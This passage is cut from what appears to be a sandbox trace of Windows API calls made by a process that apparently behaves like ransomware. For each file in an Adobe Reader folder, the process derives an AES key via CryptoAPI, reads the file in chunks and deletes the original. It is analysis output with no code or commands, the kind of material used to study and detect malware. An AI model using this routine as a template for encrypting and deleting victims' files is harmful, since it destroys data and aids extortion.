lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.733] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.733] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.733] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.734] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_email.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_email.gif")) returned 1 [0219.735] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.736] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.736] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.736] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.736] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c2 [0219.736] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.738] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.738] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.738] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.739] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_same_reviewers.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_same_reviewers.gif")) returned 1 [0219.740] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.741] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.741] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.741] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.741] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x555 [0219.741] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.743] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.743] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.743] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.744] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_shared.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_shared.gif")) returned 1 [0219.745] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.746] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.746] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.746] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.746] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xde [0219.746] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.747] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.747] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.747] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.749] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\rss.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\rss.gif")) returned 1 [0219.751] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.751] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.751] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.751] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.751] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x240 [0219.751] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.753] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.753] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.753] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.754] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_issue.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_issue.gif")) returned 1 [0219.755] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.756] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.756] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.756] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.756] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4e7 [0219.756] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.793] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.793] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.793] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.794] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_lg.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_lg.gif")) returned 1 [0219.829] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.830] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.830] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.830] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.830] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe1 [0219.830] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.832] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.832] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.832] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.833] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_ok.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_ok.gif")) returned 1 [0219.834] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.835] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.835] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.835] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.835] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x393 [0219.835] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.837] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.837] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.837] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.838] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\stop_collection_data.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\stop_collection_data.gif")) returned 1 [0219.839] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.840] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.840] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.840] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.840] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x38a [0219.840] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.842] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.843] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.843] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.844] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\submission_history.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\submission_history.gif")) returned 1 [0219.847] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.847] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.847] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.847] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.847] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x55 [0219.847] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x55, lpOverlapped=0x0) returned 1 [0219.849] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.849] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.849] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.850] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\tl.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\tl.gif")) returned 1 [0219.851] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.852] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.852] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.852] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.852] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x55 [0219.852] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x55, lpOverlapped=0x0) returned 1 [0219.853] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.853] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.853] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.854] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\tr.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\tr.gif")) returned 1 [0219.855] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.856] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.856] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.856] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.856] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x489 [0219.856] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.858] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.858] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.858] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.859] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\trash.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\trash.gif")) returned 1 [0219.860] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.861] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.896] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.896] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.896] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x338 [0219.896] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.903] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.903] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.903] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.904] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOffNotificationInAcrobat.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnoffnotificationinacrobat.gif")) returned 1 [0219.906] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.906] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.906] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.906] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.906] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3e3 [0219.906] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.909] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.909] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.909] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.910] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOffNotificationInTray.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnoffnotificationintray.gif")) returned 1 [0219.911] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.912] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.912] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.912] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.912] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x33f [0219.912] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.914] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.914] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.914] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.915] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOnNotificationInAcrobat.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnonnotificationinacrobat.gif")) returned 1 [0219.916] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.917] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.917] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.917] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.917] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3ea [0219.917] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.919] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.919] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.919] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.920] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOnNotificationInTray.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnonnotificationintray.gif")) returned 1 [0219.921] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.922] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.922] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.922] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.922] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x171 [0219.922] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.923] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.923] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.923] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.925] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\warning.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\warning.gif")) returned 1 [0219.926] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.926] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.926] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.926] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.926] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0219.926] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.927] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.927] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.927] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.928] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\_HELP.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\_help.txt")) returned 1 [0219.930] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0219.930] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0219.930] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.930] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0219.930] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4176 [0219.930] ReadFile (in: hFile=0x5d4, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0220.006] CryptDestroyHash (hHash=0x284d528) returned 1 [0220.006] CryptDestroyKey (hKey=0x284d568) returned 1 [0220.006] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0220.007] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readme.htm")) returned 1 [0220.048] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0220.049] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0220.049] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 